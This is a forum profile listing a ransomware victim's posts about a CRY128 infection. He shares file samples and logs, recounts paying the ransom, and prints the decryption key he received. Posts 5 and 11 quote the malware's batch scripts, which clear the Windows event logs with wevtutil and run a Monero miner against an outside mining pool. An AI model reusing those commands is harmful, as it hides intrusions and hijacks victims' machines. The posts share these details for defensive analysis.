mclaugb

Member
  • Content count

    14
  • Joined

  • Last visited

Community Reputation

2 Neutral

1 Follower

About mclaugb

  • Rank
    Member
  1. Hi Folks, I'm not sure if these files will help, but I've posted all of the virus files, ID, decryption key (provided by the scammers), etc. I'm hopeful that this will help those with the expertise to save others time and money. But it was a horrible experience with CRY128 which i hope will guide others in how the scam can be cracked. I had no backup and was in a time pinch at our company, so I could not wait it out for a crack. I also use R-soft tools for recovery and found some files, but unfortunately R-soft cannot recognize common engineering formatted files so it couldn't find those. First I found the virus files reaking havoc by looking at Endpoint Security logs and windows System / App logs. The smoking gun appeared to be pointed at a c:\windows\dell folder containing some batch files. Also a file 15321.exe kept appearing in my c:\ directory (All of these files are zipped in folder VIRUS_FILES). I password protected the ZIP file with the word "infected" so that no accidents happen. In a pinch, I had to pay the ransom. Using the Tor browser, the Ransom page asks you to enter your FILE ID. In my case, all files were named "*1638578921*.onion You can play with the attached encrypted files and the decryptor. The TOR Browser pulls up a "Decrypt panel" THe ID KEY must be typed in: (in my case 1638578921) There is then a "Show code" box which currently displays "35352" with a blank box. You must re-enter the code in that box. (Presumably this is used in some way to generate the key). You then press enter and it provides you with an address to send the bitcoins to. Note, the number was the same when I visited the webpage multiple times within a 24 hour period, but I think it has changed. Once paid, it provides you three files to download. (I have attached all three versions in the zip file). I have attached the instruction page (after you pay) and the "decrypt" password for all of the decryption software. Your ID: 1638578921 PRIVATE KEY: 313633383537383932315FB78EB17DCE9907B7E60F97A278A391F8497C82918C9523B80364249F1E9290C75FD2B0817449A77D8D32097A9DB94FB0BF5F652D94F73902A514DDD91E683E415FF26D19F0A860C8D743DEBB73E5AAC703D35F805065EEB1111EE828D301637FEA7EB90B5DB744E04B20026440BB398CD9169EDF7237CDFAB4611FE9563922D151A757A151B5E1D046FC4A53379B9859D9B5598082E84A7F6651CC805FE562AE8973AEA8845CF2DC25E8E409DBE7434F31C1B0B5FD5CA3EA60736DA77A2CAA1C8C17AC23EEECA445FBAB95B2F5E668C5729DB6DBB4738E10508C802BED5742064CD3F902ED75E7151033E2419F1037E283AB9F835AA25C1975C98FE3D5966D545039FA9C2B3A4FEAE1A6906BDA11417C34F96ECEF86FEC5173DBBA10526D0F8BE586D616B01CA030F6EF16182C1AA6EB493F0612836D7CC2DD8B510C93B1BA7454FA2539D296ACC6272431DDE2AB50940BBE2F00 The decryptor does not work as you will see without checking "ignore checksum" box. Then it decrypts the files just fine. Anyway, I hope this helps. Bryan CRY128_FILES_UNLOCK.zip README.TXT.txt
  2. Did you get the 15321.exe file and the two batch files? The svchost.exe was being called by that batch file every 2 minutes in my firewall logs once the virus hit. I'm going to upload a packet of files the decryptor, pre decrypted files, and post decrypted files tomorrow. They are mostly ascii files so they are very easy to read with a hex editor. Maybe having one solution to the encryption will help folks generate a decryptor. There is a 4 digit number the ransomware generates when you login to pay. That likely is used in the unlock key.
  3. Dear all, I couldn't agree more with your comments about not really having the right to complain. I have complained to the other companies as well, namely McAfee as their product totally failed and was disabled by this tool all together. Sarah posting her note was encouraging, but it was the first indication at all on the forums that there was any hope. I guess I was a little surprised that nobody from the company reached out to ask for any of the executables, file logs, Etc. I guess I inferred from that that either they didn't care, we're not working on it, or already had them and did not need them. So Sarah's note saying they were working on it was definitely encouraging! Lots of companies make free Tools in order to get their brand and their name out such that their products will be purchased. I for example am considering buying site licenses for emsi soft products. So "free" tools do ultimately tie into a business model. Good for emsisoft. Again if anyone wants encrypted files decrypted, keys, decrypting engine --do let me know if I can benefit the community through the ransom I paid. Thank you emsisoft again for your efforts. Bryan
  4. I finally gave in to the scam as our business did not have a backup and had some time sensitive materials. EMISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc. I find it a little frustrating that few if any of your team are even on these forums. Maybe we're too incapable of helping you but some updating would be nice. Anyway, I saved all of the de-crypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me. The ransom allows you to download the decrypter exe for three different filetype extensions. Mine are a bolal4nd.onion type so i used that exe. The hardest thing was actually buying bitcoins and getting that done reasonably quickly. I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase. Cost about $275 bucks all in all, but i had put 20 hours into this, a new hard drive, etc. For the record, the criminals tool did not initially decrypt the files correctly--it failed giving an error. But there is a little checkbox "ignore checksum" that when clicked it says "may ruin the files". I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files. The files opened near perfectly (some minor property information was lost) but It worked just fine and i have my files back. Now i have it running on the whole hard drive. The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you. I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.
  5. Here is the windows script mine was running run.bat echo Havefun C:\Windows\dell\svchost.exe install "Windows32_Update" "C:\Windows\dell\run64.bat" C:\Windows\dell\svchost.exe start Windows32_Update wevtutil cl "windows powershell" wevtutil cl "security" wevtutil cl "system" echo Havefun run64.bat Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1 Then repeated calls to the svchost.exe
  6. I have the exe's if you are interested. I'm not going to post them for everyone, but I'll send them to invididuals.
  7. Here are a few text files that got hit by the ransomware. It is very easy to tell where the information was added/removed/etc. I also have 4 exe and other files I have zipped up in case anyone wants to run the ransomware on a VM and see how it works. 3X8Sheep_Base_SingleBlock.dxf 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._
  8. I ran R-soft deleted files recovery in case the ransomware had deleted the old files and left the file system table. it came up with some deleted files but most are not readable--some were but all the old filenames are gone. I did find some easy files to compare using a DIFF function in a hex editor. These files are mostly ASCII text files (they were autocad files) so they make it very easy to see what the ransomware did. If any of you know how to decrypt codes, these should be two easy files to look at. 3X8Sheep_Base_SingleBlock.dxf 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._
  9. I am posting the infected files here. I have attached them here in "dell_Infected.zip". The zip file requires a password "infected" to open it. Please use with caution as they are infected .exe files with the CRY128 virus. dell_Infected.zip
  10. I can post the .exe files from this folder if anyone wants them. I submitted them to Emisoft's website. But i don't want to infect others.
  11. Okay, here are some more data points for you anti-virus making people. Mcafee, your tools are not detecting this one. These are logs from Windows Application Logs. Started svchost.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8888 -u 48aNFV3juaCLLQF8zPtdwdgvxt3YX1HmC3nvCu9psPuBDcoEBJGps3YFKU2diFBLby7WoQUqAo3ZP1Z3ay9yt2fDVAaWBuj -p x for service Mysqlvers in C:\windows. Started C:\Windows\dell\run64.bat for service Windows32_Update in C:\Windows\dell. bat file says: Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1 In c:\windows\dell there is 'run.bat' 'run64.bat' 'svchost.exe' Other windows application logs show: C:\Windows\systxm\winlogon.exe NT AUTHORITY\SYSTEM ran C:\Windows\svchoot.exe, which attempted to access C:\Windows\systxm\svchost.exe. The potentially unwanted program named CoinMiner was detected and deleted. Mysqlvers 1500 2000 Mysqlvers 0 Restart svchost.exe
  12. We're finding that many of the encrypted files are the exact same filesize as the unencrypted originals. See the attached files. 3X8Sheep_Base_SingleBlock.dxf 3X8Sheep_Base_SingleBlock.dxf.id_1638578921_gebdp3k7bolalnd4.onion._
  13. I have the same issue with my files renamed *_gebdp3k7bolalnd4.onion. So far i cannot find the malicious exe file. Mcafee and Malware bytes so far have come up with no threats. I checked the Mcafee Endpoint Security Logs and somehow the attack appeard to disable on-access scanning. The firewall event monitor also picked up the ports in the attached. So this should help folks identify one method this is getting in and disabling all Mcafee tools so that it can run. FirewallEventMonitor.log EndpointSecurityPlatform_Activity.log OnDemandScan_Activity.log ThreatPrevention_Activity.log
  14. My files have the same gebdp3k7bolalnd4.onion._ extensions. Mine was a windows machine with Remote Desktop connections disabled but Remote assistance enabled. I consider myself very computer savvy but so far I've found no applications, no processes running in the background. MalwareBytes and McAfee both cannot detect this strain. Files do not appear to be any specific number of kb larger than the originals (it seems to vary depending on the file). The Cry128 decrypter attempted two sets of files without success. I've attached a few files here. I can come up with more of them. Bobbin REV 6 Specification print.pdf Bobbin REV 6 Specification print.pdf.id_1638578921_gebdp3k7bolalnd4.onion._ TDS-DC25-UB25-RW-MAC-07-2014.pdf TDS-DC25-UB25-RW-MAC-07-2014.pdf.id_1638578921_gebdp3k7bolalnd4.onion._